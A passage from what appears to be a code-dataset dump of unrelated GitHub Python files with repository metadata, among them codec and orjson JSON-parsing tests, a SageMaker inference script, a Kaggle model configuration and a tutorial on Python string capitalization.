elif csetval >= 0x10000:
csetch = bytes([(csetval >> 16), ((csetval >> 8) & 0xff),
(csetval & 0xff)])
elif csetval >= 0x100:
csetch = bytes([(csetval >> 8), (csetval & 0xff)])
else:
continue
unich = unichrs(data[1])
if ord(unich) == 0xfffd or unich in urt_wa:
continue
urt_wa[unich] = csetch
self._testpoint(csetch, unich)
def _test_mapping_file_ucm(self):
with self.open_mapping_file() as f:
ucmdata = f.read()
uc = re.findall('<a u="([A-F0-9]{4})" b="([0-9A-F ]+)"/>', ucmdata)
for uni, coded in uc:
unich = chr(int(uni, 16))
codech = bytes(int(c, 16) for c in coded.split())
self._testpoint(codech, unich)
def test_mapping_supplemental(self):
for mapping in self.supmaps:
self._testpoint(*mapping)
def _testpoint(self, csetch, unich):
if (csetch, unich) not in self.pass_enctest:
self.assertEqual(unich.encode(self.encoding), csetch)
if (csetch, unich) not in self.pass_dectest:
self.assertEqual(str(csetch, self.encoding), unich)
def test_errorhandle(self):
for source, scheme, expected in self.codectests:
if isinstance(source, bytes):
func = source.decode
else:
func = source.encode
if expected:
if isinstance(source, bytes):
result = func(self.encoding, scheme)
self.assertTrue(type(result) is str, type(result))
self.assertEqual(result, expected,
'%a.decode(%r, %r)=%a != %a'
% (source, self.encoding, scheme, result,
expected))
else:
result = func(self.encoding, scheme)
self.assertTrue(type(result) is bytes, type(result))
self.assertEqual(result, expected,
'%a.encode(%r, %r)=%a != %a'
% (source, self.encoding, scheme, result,
expected))
else:
self.assertRaises(UnicodeError, func, self.encoding, scheme)
def load_teststring(name):
dir = os.path.join(os.path.dirname(__file__), 'cjkencodings')
with open(os.path.join(dir, name + '.txt'), 'rb') as f:
encoded = f.read()
with open(os.path.join(dir, name + '-utf8.txt'), 'rb') as f:
utf8 = f.read()
return encoded, utf8
| [
"15173342800@163.com"
] | 15173342800@163.com |
7e49268cc95f7618ee769890ed82c3ea558465c2 | c15a2b234376b3a8ea5f3c790b4afd47150dcfcc | /Libs_Modules/test_3.py | b843063ce4cb8f089f79f6cafc5b1330a6760613 | [] | no_license | GLMF/GLMF225 | 9c05b60d8bce71973460e2d98c454b22115b92fc | c83e506f522af89cff1c76286689bb5cf2f412cf | refs/heads/master | 2020-05-03T20:48:00.897857 | 2019-04-01T07:41:13 | 2019-04-01T07:41:13 | 178,810,926 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 611 | py | from PyInquirer import prompt
widget = [
{
'type': 'expand',
'name': 'serie',
'message': 'Quelle est votre série préférée ?',
'choices': [
{
'key': 'g',
'name': 'Game of Thrones',
'value': 'GoT'
},
{
'key': 'l',
'name': 'Lucifer',
'value': 'lucifer'
},
{
'key': 'w',
'name': 'Westworld',
'value': 'westworld'
}
]
}
]
result = prompt(widget)
| [
"tristan.colombo@gmail.com"
] | tristan.colombo@gmail.com |
3dd3ad42d05707545bad918cdf8e1c1a1956688b | 8e24e8bba2dd476f9fe612226d24891ef81429b7 | /geeksforgeeks/python/basic/3_2.py | 1a6ecef30016ab772e487b8b0093ba0f863bafe3 | [] | no_license | qmnguyenw/python_py4e | fb56c6dc91c49149031a11ca52c9037dc80d5dcf | 84f37412bd43a3b357a17df9ff8811eba16bba6e | refs/heads/master | 2023-06-01T07:58:13.996965 | 2021-06-15T08:39:26 | 2021-06-15T08:39:26 | 349,059,725 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,003 | py | Difference between str.capitalize() VS str.title()
Both **title()** and **capitalize()** have similar functionality of
capitalizing first characters. Let us see the difference between the two of
them.
### title()
**title()** function in Python is the Python String Method which is used to
convert the first character in each word to Uppercase and remaining characters
to Lowercase in the string and returns a new string.
> **Syntax:** str.title()
>
> **Parameters:** None
>
> **Returns:** This function returns a string which has first letter in each
> word is uppercase and all remaining letters are lowercase.
>
>
>
>
>
>
**Example:**
## Python3
__
__
__
__
__
__
__
# Python Title() Method Example
str1 = 'geeKs foR geEks'
str2 = str1.title()
print ('First Output after Title() method is = ', str2)
# observe the original string
print ('Converted String is = ', str1.title())
print ('Original String is = ', str1 )
# Performing title() function directly
str3 = 'ASIPU pawan kuMAr'.title()
print ('Second Output after Title() method is = ', str3)
str4 = 'stutya kUMari sHAW'.title()
print ('Third Output after Title() method is = ', str4)
str5 = '6041'.title()
print ('Fourth Output after Title() method is = ', str5)
---
__
__
**Output:**
First Output after Title() method is = Geeks For Geeks
Converted String is = Geeks For Geeks
Original String is = geeKs foR geEks
Second Output after Title() method is = Asipu Pawan Kumar
Third Output after Title() method is = Stutya Kumari Shaw
Fourth Output after Title() method is = 6041
### capitalize()
In Python, the **capitalize()** method converts the first character of a
string to a capital **(uppercase)** letter. If the string has its first
character as capital, then it returns the original string.
> **Syntax:** str.title()
>
> **Parameters:** None
>
> **Returns:** This function returns a string which has the first letter in
> uppercase and all remaining letters in lowercase.
**Example:**
## Python3
__
__
__
__
__
__
__
# Python program to demonstrate the
# use of capitalize() function
# capitalize() first letter of
# string.
name = "geeks for geeks"
print(name.capitalize())
# demonstration of individual words
# capitalization to generate camel case
name1 = "geeks"
name2 = "for"
name3 = "geeks"
print(name1.capitalize() + name2.capitalize()
+ name3.capitalize())
---
__
__
**Output:**
Geeks for geeks
GeeksForGeeks
### Difference Between title() and capitalize()
The difference between them is that Python string method title() returns a
copy of the string in which the first characters of all the words are
capitalized whereas the string method capitalize() returns a copy of the
string in which just the first word of the entire string is capitalized.
**Example:**
str = "geeks for geeks"
str.title() will return Geeks For Geeks
str.capitalize() will return Geeks for geeks
## Python3
__
__
__
__
__
__
__
str1= "my name is xyz"
str2 = "geeks for geeks"
# using title()
print(str1.title())
print(str2.title())
# usng capitalize()
print(str1.capitalize())
print(str2.capitalize())
---
__
__
**Output:**
My Name Is Xyz
Geeks For Geeks
My name is xyz
Geeks for geeks
Attention geek! Strengthen your foundations with the **Python Programming
Foundation** Course and learn the basics.
To begin with, your interview preparations Enhance your Data Structures
concepts with the **Python DS** Course.
My Personal Notes _arrow_drop_up_
Save
| [
"qmnguyenw@gmail.com"
] | qmnguyenw@gmail.com |
1d664ef000866e3f35691cf6c589f02e172914c7 | 77d3633bb64d585aa087677af9ca6f672ae9ff1f | /src/sagemaker/serve/predict_nlp.py | a854a3c9b662a2a26b489283e45b4dead44b083c | [
"MIT"
] | permissive | reneang17/authorencoder | 0f16d9d2c72db3bd3e50fac03b7eb6e25e6f7f75 | e607ddc77d18fc62e292adfe1595a5dd35e10f99 | refs/heads/master | 2022-07-15T01:23:28.450030 | 2020-03-03T05:10:15 | 2020-03-03T05:10:15 | 237,246,389 | 2 | 0 | MIT | 2020-03-08T01:37:00 | 2020-01-30T15:46:16 | Jupyter Notebook | UTF-8 | Python | false | false | 3,887 | py | import argparse
import json
import os
import pickle
import sys
import sagemaker_containers
import pandas as pd
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import torch.utils.data
import numpy
from utils_nlp import tokenize, emb
from models import CNN
from sklearn.neighbors import KNeighborsClassifier as KNC
def model_fn(model_dir):
"""Load the PyTorch model from the `model_dir` directory."""
print("Loading model.")
# First, load the parameters used to create the model.
model_info = {}
model_info_path = os.path.join(model_dir, 'model_info.pth')
with open(model_info_path, 'rb') as f:
model_info = torch.load(f)
print("model_info: {}".format(model_info))
# Determine the device and construct the model.
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
#**********************************
# Load model
INPUT_DIM = model_info['INPUT_DIM']
WORD_EMBEDDING_DIM = model_info['WORD_EMBEDDING_DIM']
N_FILTERS = model_info['N_FILTERS']
FILTER_SIZES = model_info['FILTER_SIZES']
AUTHOR_DIM = model_info['AUTHOR_DIM']
DROPOUT = model_info['DROPOUT']
PAD_IDX = model_info['PAD_IDX']
#UNK_IDX = 0
model = CNN(INPUT_DIM, WORD_EMBEDDING_DIM, N_FILTERS, FILTER_SIZES, AUTHOR_DIM, DROPOUT, PAD_IDX)
print("Model loaded with embedding_dim {}, vocab_size {}.".format(
# args.embedding_dim, args.hidden_dim, args.vocab_size
WORD_EMBEDDING_DIM, INPUT_DIM))
#**********************************
# Load the stored model parameters.
model_path = os.path.join(model_dir, 'model_state.pt')
with open(model_path, 'rb') as f:
model.load_state_dict(torch.load(f))
# Load the saved word_dict.
word_dict_path = os.path.join(model_dir, 'word_dict.pkl')
with open(word_dict_path, 'rb') as f:
model.word_dict = pickle.load(f)
model.to(device).eval()
print("Done loading model.")
return model
def input_fn(serialized_input_data, content_type):
print('Deserializing the input data.')
if content_type == 'text/plain':
data = serialized_input_data.decode('utf-8')
return data
raise Exception('Requested unsupported ContentType in content_type: ' + content_type)
def output_fn(prediction_output, accept):
print('Serializing the generated output.')
return str(prediction_output)
#import training data and form clusters
#author_encoder_path = os.path.join('./', 'authorencoder.pkl')
#with open(author_encoder_path, 'rb') as f:
# train_embeddings_otl, train_labels_otl= pickle.load( f )
train_embeddings_otl, train_labels_otl = emb()
from sklearn.neighbors import KNeighborsClassifier as KNC
KNN = KNC(n_neighbors=3)
KNN.fit(train_embeddings_otl, train_labels_otl)
def predict_fn(input_text, model):
print('Inferring sentiment of input data.')
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
if model.word_dict is None:
raise Exception('Model has not been loaded properly, no word_dict.')
model = model
word_dict = model.word_dict
tokenized = tokenize(word_dict, input_text)
tensor = torch.tensor(tokenized).to(device)
tensor = tensor.unsqueeze(0).unsqueeze(0)
# Make sure to put the model into evaluation mode
model.eval()
#raise Exception('This is the input: ' + tensor)
with torch.no_grad():
output = model.forward(tensor).tolist()
prediction = int(KNN.predict(output).item())
author_dir = {0: 'John Dryden', 1: 'Robert Pinsky', 2: 'Anne Carson', 3: 'Alfred Lord Tennyson', 4: 'Allen Ginsberg', 5: 'Philip Whalen', 6: 'Matthew Arnold', 7: 'Walt Whitman', 8: 'William Shakespeare', 9: 'Beowulf Anonimous'}
return author_dir[prediction]
| [
"reneang17@gmail.com"
] | reneang17@gmail.com |
e41bf4c1770b7508b7f425ca2d18b7d1d68dad13 | 89e3f694021f261b95e494d2b479367bacde8251 | /tests/types/test_entity.py | 2910ad18598425b5e693e0e5e7401820c5e9b731 | [
"MIT"
] | permissive | dchaplinsky/followthemoney | 6f9c05f430f8bfb04f7841378fd2ee5cf9b33235 | a2a150f558acb5a1c985b9dc891c98c0fdf2f17e | refs/heads/master | 2020-09-10T08:16:14.617602 | 2019-11-14T09:15:52 | 2019-11-14T09:15:52 | 221,699,199 | 1 | 0 | MIT | 2019-11-14T13:03:41 | 2019-11-14T13:03:41 | null | UTF-8 | Python | false | false | 790 | py | import unittest
from followthemoney.types import registry
entities = registry.entity
class EntityTest(unittest.TestCase):
def test_parse(self):
self.assertEqual(entities.clean('88'), '88')
self.assertEqual(entities.clean(88), '88')
self.assertEqual(entities.clean({'id': 88}), '88')
self.assertEqual(entities.clean(None), None)
self.assertEqual(entities.clean('With spaces'), None)
self.assertEqual(entities.clean('With!special'), None)
self.assertEqual(entities.clean('with.dot'), 'with.dot')
def test_normalize(self):
self.assertEqual(entities.normalize('FOO'), ['FOO'])
self.assertEqual(entities.normalize(None), [])
def test_funcs(self):
self.assertEqual(entities.specificity('bla'), 1)
| [
"friedrich@pudo.org"
] | friedrich@pudo.org |
bd592c205d08a1f8ddc82451cb09b38db2934de7 | a4deea660ea0616f3b5ee0b8bded03373c5bbfa2 | /concrete_instances/register-variants/vfmsubadd213ps_xmm_xmm_xmm/instructions/vfmsubadd213ps_xmm_xmm_xmm/vfmsubadd213ps_xmm_xmm_xmm.gen.vex.py | 47e6123f37d250678ee38d0e8009fe13fcb34be4 | [] | no_license | Vsevolod-Livinskij/x86-64-instruction-summary | 4a43472e26f0e4ec130be9a82f7e3f3c1361ccfd | c276edab1b19e3929efb3ebe7514489f66087764 | refs/heads/master | 2022-02-02T18:11:07.818345 | 2019-01-25T17:19:21 | 2019-01-25T17:19:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 210 | py | import angr
proj = angr.Project('./instructions/vfmsubadd213ps_xmm_xmm_xmm/vfmsubadd213ps_xmm_xmm_xmm.o')
print proj.arch
print proj.entry
print proj.filename
irsb = proj.factory.block(proj.entry).vex
irsb.pp() | [
"sdasgup3@illinois.edu"
] | sdasgup3@illinois.edu |
0fc748c3389c508b98a2f8ce1f12b4fb2ed423d3 | f213549d8725acaf5417d0d5290430d499bf3cf3 | /lino/core/boundaction.py | b3a6a42f40bb013688e5fa75400c13ca08ccbe41 | [
"BSD-2-Clause"
] | permissive | ExcellentServ/lino | 56c8159428a451058a35dad75e8799d239c2dc0e | 9ea630e719d47843dd8427dd64db22633626fd3d | refs/heads/master | 2020-12-28T23:15:47.380120 | 2015-01-27T14:53:10 | 2015-01-27T14:53:10 | 29,911,723 | 0 | 0 | null | 2015-01-27T11:44:09 | 2015-01-27T11:44:08 | null | UTF-8 | Python | false | false | 3,744 | py | # -*- coding: UTF-8 -*-
# Copyright 2009-2015 Luc Saffre
# License: BSD (see file COPYING for details)
"""
.. autosummary::
"""
import logging
logger = logging.getLogger(__name__)
from django.conf import settings
from lino.utils import curry
from lino.core import actions
class BoundAction(object):
"""An Action which is bound to an Actor. If an Actor has subclasses,
each subclass "inherits" its actions.
"""
def __init__(self, actor, action):
if not isinstance(action, actions.Action):
raise Exception("%s : %r is not an Action" % (actor, action))
self.action = action
self.actor = actor
required = dict()
if action.readonly:
required.update(actor.required)
#~ elif isinstance(action,InsertRow):
#~ required.update(actor.create_required)
elif isinstance(action, actions.DeleteSelected):
required.update(actor.delete_required)
else:
required.update(actor.update_required)
required.update(action.required)
#~ print 20120628, str(a), required
#~ def wrap(a,required,fn):
#~ return fn
debug_permissions = actor.debug_permissions and \
action.debug_permissions
if debug_permissions:
if settings.DEBUG:
logger.info("debug_permissions active for %r (required=%s)",
self, required)
else:
raise Exception(
"settings.DEBUG is False, but `debug_permissions` "
"for %r (required=%s) is active." % (self, required))
from lino.modlib.users.utils import (
make_permission_handler, make_view_permission_handler)
self.allow_view = curry(make_view_permission_handler(
self, action.readonly, debug_permissions, **required), action)
self._allow = curry(make_permission_handler(
action, actor, action.readonly,
debug_permissions, **required), action)
#~ if debug_permissions:
#~ logger.info("20130424 _allow is %s",self._allow)
#~ actor.actions.define(a.action_name,ba)
def get_window_layout(self):
return self.action.get_window_layout(self.actor)
def get_window_size(self):
return self.action.get_window_size(self.actor)
def full_name(self):
return self.action.full_name(self.actor)
def request(self, *args, **kw):
kw.update(action=self)
return self.actor.request(*args, **kw)
def get_button_label(self, *args):
return self.action.get_button_label(self.actor, *args)
#~ def get_panel_btn_handler(self,*args):
#~ return self.action.get_panel_btn_handler(self.actor,*args)
def setup_action_request(self, *args):
return self.action.setup_action_request(self.actor, *args)
def get_row_permission(self, ar, obj, state):
#~ if self.actor is None: return False
return self.actor.get_row_permission(obj, ar, state, self)
def get_bound_action_permission(self, ar, obj, state):
if not self.action.get_action_permission(ar, obj, state):
return False
return self._allow(ar.get_user(), obj, state)
def get_view_permission(self, profile):
"""
Return True if this bound action is visible for users of this
profile.
"""
if not self.actor.get_view_permission(profile):
return False
if not self.action.get_view_permission(profile):
return False
return self.allow_view(profile)
def __repr__(self):
return "<%s(%s,%r)>" % (
self.__class__.__name__, self.actor, self.action)
| [
"luc.saffre@gmail.com"
] | luc.saffre@gmail.com |
7b5fe80b8b6972477471881efb10fa5a505144d9 | bfc25f1ad7bfe061b57cfab82aba9d0af1453491 | /data/external/repositories_2to3/267667/kaggle-heart-master/configurations/je_os_fixedaggr_joniscale80small_augzoombright.py | 9b93b720a6e67660825c575404d24f2b139a2e03 | [
"MIT"
] | permissive | Keesiu/meta-kaggle | 77d134620ebce530d183467202cf45639d9c6ff2 | 87de739aba2399fd31072ee81b391f9b7a63f540 | refs/heads/master | 2020-03-28T00:23:10.584151 | 2018-12-20T19:09:50 | 2018-12-20T19:09:50 | 147,406,338 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,771 | py | """Single slice vgg with normalised scale.
"""
import functools
import lasagne as nn
import numpy as np
import theano
import theano.tensor as T
import data_loader
import deep_learning_layers
import image_transform
import layers
import preprocess
import postprocess
import objectives
import theano_printer
import updates
import utils
# Random params
rng = np.random
take_a_dump = False # dump a lot of data in a pkl-dump file. (for debugging)
dump_network_loaded_data = False # dump the outputs from the dataloader (for debugging)
# Memory usage scheme
caching = None
# Save and validation frequency
validate_every = 20
validate_train_set = True
save_every = 20
restart_from_save = False
dump_network_loaded_data = False
# Training (schedule) parameters
# - batch sizes
batch_size = 8
sunny_batch_size = 4
batches_per_chunk = 16
num_epochs_train = 400
# - learning rate and method
base_lr = 0.0001
learning_rate_schedule = {
0: base_lr,
9*num_epochs_train/10: base_lr/10,
}
momentum = 0.9
build_updates = updates.build_adam_updates
# Preprocessing stuff
cleaning_processes = [
preprocess.set_upside_up,]
cleaning_processes_post = [
functools.partial(preprocess.normalize_contrast_zmuv, z=2)]
augmentation_params = {
"rotation": (-180, 180),
"shear": (0, 0),
"translation": (-8, 8),
"flip_vert": (0, 1),
"roll_time": (0, 0),
"flip_time": (0, 0),
"zoom_x": (.75, 1.25),
"zoom_y": (.75, 1.25),
"change_brightness": (-0.3, 0.3),
}
augmentation_params_test = {
"rotation": (-180, 180),
"shear": (0, 0),
"translation": (-8, 8),
"flip_vert": (0, 1),
"roll_time": (0, 0),
"flip_time": (0, 0),
"zoom_x": (.80, 1.20),
"zoom_y": (.80, 1.20),
"change_brightness": (-0.2, 0.2),
}
use_hough_roi = True
preprocess_train = functools.partial( # normscale_resize_and_augment has a bug
preprocess.preprocess_normscale,
normscale_resize_and_augment_function=functools.partial(
image_transform.normscale_resize_and_augment_2,
normalised_patch_size=(80,80)))
preprocess_validation = functools.partial(preprocess_train, augment=False)
preprocess_test = preprocess_train
sunny_preprocess_train = preprocess.sunny_preprocess_with_augmentation
sunny_preprocess_validation = preprocess.sunny_preprocess_validation
sunny_preprocess_test = preprocess.sunny_preprocess_validation
# Data generators
create_train_gen = data_loader.generate_train_batch
create_eval_valid_gen = functools.partial(data_loader.generate_validation_batch, set="validation")
create_eval_train_gen = functools.partial(data_loader.generate_validation_batch, set="train")
create_test_gen = functools.partial(data_loader.generate_test_batch, set=["validation", "test"])
def filter_samples(folders):
# don't use patients who don't have mre than 6 slices
return [
folder for folder in folders
if data_loader.compute_nr_slices(folder) > 6]
# Input sizes
image_size = 64
nr_slices = 20
data_sizes = {
"sliced:data:sax": (batch_size, nr_slices, 30, image_size, image_size),
"sliced:data:sax:locations": (batch_size, nr_slices),
"sliced:data:sax:is_not_padded": (batch_size, nr_slices),
"sliced:data:randomslices": (batch_size, nr_slices, 30, image_size, image_size),
"sliced:data:singleslice:difference:middle": (batch_size, 29, image_size, image_size),
"sliced:data:singleslice:difference": (batch_size, 29, image_size, image_size),
"sliced:data:singleslice": (batch_size, 30, image_size, image_size),
"sliced:data:ax": (batch_size, 30, 15, image_size, image_size),
"sliced:data:shape": (batch_size, 2,),
"sunny": (sunny_batch_size, 1, image_size, image_size)
# TBC with the metadata
}
# Objective
l2_weight = 0.000
l2_weight_out = 0.000
def build_objective(interface_layers):
# l2 regu on certain layers
l2_penalty = nn.regularization.regularize_layer_params_weighted(
interface_layers["regularizable"], nn.regularization.l2)
# build objective
return objectives.KaggleObjective(interface_layers["outputs"], penalty=l2_penalty)
# Testing
postprocess = postprocess.postprocess
test_time_augmentations = 100 # More augmentations since a we only use single slices
#tta_average_method = lambda x: np.cumsum(utils.norm_geometric_average(utils.cdf_to_pdf(x)))
# nonlinearity putting a lower bound on it's output
def lb_softplus(lb):
return lambda x: nn.nonlinearities.softplus(x) + lb
init = nn.init.Orthogonal()
rnn_layer = functools.partial(nn.layers.RecurrentLayer,
W_in_to_hid=init,
W_hid_to_hid=init,
b=nn.init.Constant(0.1),
nonlinearity=nn.nonlinearities.rectify,
hid_init=nn.init.Constant(0.),
backwards=False,
learn_init=True,
gradient_steps=-1,
grad_clipping=False,
unroll_scan=False,
precompute_input=False)
# Architecture
def build_model():
#################
# Regular model #
#################
input_size = data_sizes["sliced:data:sax"]
input_size_mask = data_sizes["sliced:data:sax:is_not_padded"]
input_size_locations = data_sizes["sliced:data:sax:locations"]
l0 = nn.layers.InputLayer(input_size)
lin_slice_mask = nn.layers.InputLayer(input_size_mask)
lin_slice_locations = nn.layers.InputLayer(input_size_locations)
# PREPROCESS SLICES SEPERATELY
# Convolutional layers and some dense layers are defined in a submodel
l0_slices = nn.layers.ReshapeLayer(l0, (-1, [2], [3], [4]))
from . import je_ss_jonisc80small_360_gauss_longer_augzoombright
submodel = je_ss_jonisc80small_360_gauss_longer_augzoombright.build_model(l0_slices)
# Systole Dense layers
l_sys_mu = submodel["meta_outputs"]["systole:mu"]
l_sys_sigma = submodel["meta_outputs"]["systole:sigma"]
# Diastole Dense layers
l_dia_mu = submodel["meta_outputs"]["diastole:mu"]
l_dia_sigma = submodel["meta_outputs"]["diastole:sigma"]
# AGGREGATE SLICES PER PATIENT
l_scaled_slice_locations = layers.TrainableScaleLayer(lin_slice_locations, scale=nn.init.Constant(0.1), trainable=False)
# Systole
l_pat_sys_ss_mu = nn.layers.ReshapeLayer(l_sys_mu, (-1, nr_slices))
l_pat_sys_ss_sigma = nn.layers.ReshapeLayer(l_sys_sigma, (-1, nr_slices))
l_pat_sys_aggr_mu_sigma = layers.JeroenLayer([l_pat_sys_ss_mu, l_pat_sys_ss_sigma, lin_slice_mask, l_scaled_slice_locations], rescale_input=100.)
l_systole = layers.MuSigmaErfLayer(l_pat_sys_aggr_mu_sigma)
# Diastole
l_pat_dia_ss_mu = nn.layers.ReshapeLayer(l_dia_mu, (-1, nr_slices))
l_pat_dia_ss_sigma = nn.layers.ReshapeLayer(l_dia_sigma, (-1, nr_slices))
l_pat_dia_aggr_mu_sigma = layers.JeroenLayer([l_pat_dia_ss_mu, l_pat_dia_ss_sigma, lin_slice_mask, l_scaled_slice_locations], rescale_input=100.)
l_diastole = layers.MuSigmaErfLayer(l_pat_dia_aggr_mu_sigma)
submodels = [submodel]
return {
"inputs":{
"sliced:data:sax": l0,
"sliced:data:sax:is_not_padded": lin_slice_mask,
"sliced:data:sax:locations": lin_slice_locations,
},
"outputs": {
"systole": l_systole,
"diastole": l_diastole,
},
"regularizable": dict(
{},
**{
k: v
for d in [model["regularizable"] for model in submodels if "regularizable" in model]
for k, v in list(d.items()) }
),
# "pretrained":{
# je_ss_jonisc80small_360_gauss_longer_augzoombright.__name__: submodel["outputs"],
# }
}
| [
"keesiu.wong@gmail.com"
] | keesiu.wong@gmail.com |
2954c7bb5b4630407209831dc851c067c8f7488a | b445f7ba5ae4899c3782dc08627b778de6bbf12b | /test/test_jsonchecker.py | 88703e6457bdd1c1e3214667c699e8b5be6bb428 | [
"Apache-2.0",
"MIT"
] | permissive | ijl/orjson | 91e620f1e68e985064a68e77569b56ff378637ea | d1cd27e29c8df2768be016071d0800a92d120786 | refs/heads/master | 2023-08-31T05:10:58.385975 | 2023-08-29T12:29:42 | 2023-08-29T13:05:57 | 158,618,772 | 4,895 | 243 | Apache-2.0 | 2023-09-08T00:40:34 | 2018-11-21T23:43:14 | Python | UTF-8 | Python | false | false | 6,187 | py | # SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
Tests files from http://json.org/JSON_checker/
"""
import pytest
import orjson
from .util import read_fixture_str
PATTERN_1 = '["JSON Test Pattern pass1",{"object with 1 member":["array with 1 element"]},{},[],-42,true,false,null,{"integer":1234567890,"real":-9876.54321,"e":1.23456789e-13,"E":1.23456789e34,"":2.3456789012e76,"zero":0,"one":1,"space":" ","quote":"\\"","backslash":"\\\\","controls":"\\b\\f\\n\\r\\t","slash":"/ & /","alpha":"abcdefghijklmnopqrstuvwyz","ALPHA":"ABCDEFGHIJKLMNOPQRSTUVWYZ","digit":"0123456789","0123456789":"digit","special":"`1~!@#$%^&*()_+-={\':[,]}|;.</>?","hex":"ģ䕧覫췯ꯍ\uef4a","true":true,"false":false,"null":null,"array":[],"object":{},"address":"50 St. James Street","url":"http://www.JSON.org/","comment":"// /* <!-- --","# -- --> */":" "," s p a c e d ":[1,2,3,4,5,6,7],"compact":[1,2,3,4,5,6,7],"jsontext":"{\\"object with 1 member\\":[\\"array with 1 element\\"]}","quotes":"" \\" %22 0x22 034 "","/\\\\\\"쫾몾ꮘﳞ볚\uef4a\\b\\f\\n\\r\\t`1~!@#$%^&*()_+-=[]{}|;:\',./<>?":"A key can be any string"},0.5,98.6,99.44,1066,10.0,1.0,0.1,1.0,2.0,2.0,"rosebud"]'.encode()
class TestJsonChecker:
def _run_fail_json(self, filename, exc=orjson.JSONDecodeError):
data = read_fixture_str(filename, "jsonchecker")
pytest.raises(exc, orjson.loads, data)
def _run_pass_json(self, filename, match=""):
data = read_fixture_str(filename, "jsonchecker")
assert orjson.dumps(orjson.loads(data)) == match
def test_fail01(self):
"""
fail01.json
"""
self._run_pass_json(
"fail01.json",
b'"A JSON payload should be an object or array, not a string."',
)
def test_fail02(self):
"""
fail02.json
"""
self._run_fail_json("fail02.json", orjson.JSONDecodeError) # EOF
def test_fail03(self):
"""
fail03.json
"""
self._run_fail_json("fail03.json")
def test_fail04(self):
"""
fail04.json
"""
self._run_fail_json("fail04.json")
def test_fail05(self):
"""
fail05.json
"""
self._run_fail_json("fail05.json")
def test_fail06(self):
"""
fail06.json
"""
self._run_fail_json("fail06.json")
def test_fail07(self):
"""
fail07.json
"""
self._run_fail_json("fail07.json")
def test_fail08(self):
"""
fail08.json
"""
self._run_fail_json("fail08.json")
def test_fail09(self):
"""
fail09.json
"""
self._run_fail_json("fail09.json")
def test_fail10(self):
"""
fail10.json
"""
self._run_fail_json("fail10.json")
def test_fail11(self):
"""
fail11.json
"""
self._run_fail_json("fail11.json")
def test_fail12(self):
"""
fail12.json
"""
self._run_fail_json("fail12.json")
def test_fail13(self):
"""
fail13.json
"""
self._run_fail_json("fail13.json")
def test_fail14(self):
"""
fail14.json
"""
self._run_fail_json("fail14.json")
def test_fail15(self):
"""
fail15.json
"""
self._run_fail_json("fail15.json")
def test_fail16(self):
"""
fail16.json
"""
self._run_fail_json("fail16.json")
def test_fail17(self):
"""
fail17.json
"""
self._run_fail_json("fail17.json")
def test_fail18(self):
"""
fail18.json
"""
self._run_pass_json(
"fail18.json", b'[[[[[[[[[[[[[[[[[[[["Too deep"]]]]]]]]]]]]]]]]]]]]'
)
def test_fail19(self):
"""
fail19.json
"""
self._run_fail_json("fail19.json")
def test_fail20(self):
"""
fail20.json
"""
self._run_fail_json("fail20.json")
def test_fail21(self):
"""
fail21.json
"""
self._run_fail_json("fail21.json")
def test_fail22(self):
"""
fail22.json
"""
self._run_fail_json("fail22.json")
def test_fail23(self):
"""
fail23.json
"""
self._run_fail_json("fail23.json")
def test_fail24(self):
"""
fail24.json
"""
self._run_fail_json("fail24.json")
def test_fail25(self):
"""
fail25.json
"""
self._run_fail_json("fail25.json")
def test_fail26(self):
"""
fail26.json
"""
self._run_fail_json("fail26.json")
def test_fail27(self):
"""
fail27.json
"""
self._run_fail_json("fail27.json")
def test_fail28(self):
"""
fail28.json
"""
self._run_fail_json("fail28.json")
def test_fail29(self):
"""
fail29.json
"""
self._run_fail_json("fail29.json")
def test_fail30(self):
"""
fail30.json
"""
self._run_fail_json("fail30.json")
def test_fail31(self):
"""
fail31.json
"""
self._run_fail_json("fail31.json")
def test_fail32(self):
"""
fail32.json
"""
self._run_fail_json("fail32.json", orjson.JSONDecodeError) # EOF
def test_fail33(self):
"""
fail33.json
"""
self._run_fail_json("fail33.json")
def test_pass01(self):
"""
pass01.json
"""
self._run_pass_json("pass01.json", PATTERN_1)
def test_pass02(self):
"""
pass02.json
"""
self._run_pass_json(
"pass02.json", b'[[[[[[[[[[[[[[[[[[["Not too deep"]]]]]]]]]]]]]]]]]]]'
)
def test_pass03(self):
"""
pass03.json
"""
self._run_pass_json(
"pass03.json",
b'{"JSON Test Pattern pass3":{"The outermost value":"must be '
b'an object or array.","In this test":"It is an object."}}',
)
| [
"ijl@mailbox.org"
] | ijl@mailbox.org |
e71a1663ae44c868dbd627ad3114ac41adc06bc0 | b99195cf2d181dec5c31aa7e58d747f474153802 | /Dictionary/Built-in Functions with Dictionary.py | cbca42c09ab3385fa84cac09cd510faf64f700a9 | [] | no_license | eldadpuzach/MyPythonProjects | b1b4d56a822fd781c7c4c7a9e4bb5408c180c187 | 3a961a7c265caf1369067d98e94564f01f1bde74 | refs/heads/master | 2020-03-20T18:07:43.319331 | 2019-02-13T22:07:10 | 2019-02-13T22:07:10 | 137,570,971 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 598 | py | # Built-in Functions with Dictionary
#
# Built-in functions like all(), any(), len(), cmp(), sorted() etc. are commonly used with dictionary to perform different tasks.
# Built-in Functions with Dictionary Function Description
# all() Return True if all keys of the dictionary are true (or if the dictionary is empty).
# any() Return True if any key of the dictionary is true. If the dictionary is empty, return False.
# len() Return the length (the number of items) in the dictionary.
# cmp() Compares items of two dictionaries.
# sorted() Return a new sorted list of keys in the dictionary. | [
"eldadpuzach@gmail.com"
] | eldadpuzach@gmail.com |
f6450232aaf3f0568032b2d87c7fa644d8ab19c9 | 0c281ba9bb634d518536eea03059cdb05ba32cc5 | /many_to_one/migrations/0002_wpsuser.py | 1c896f777d6f0af5d69c690885ff05aa7fbc7677 | [] | no_license | parkhongbeen/Practice-Document | c09ef3a64d64c2067604b0c5f5d6fcabd96a8e50 | 441c1c1b21c6b66e1a01eea7487f6dffdfd98e58 | refs/heads/master | 2020-12-02T16:47:20.725694 | 2020-01-04T09:30:20 | 2020-01-04T09:30:20 | 231,061,336 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 674 | py | # Generated by Django 2.2.9 on 2020-01-02 05:42
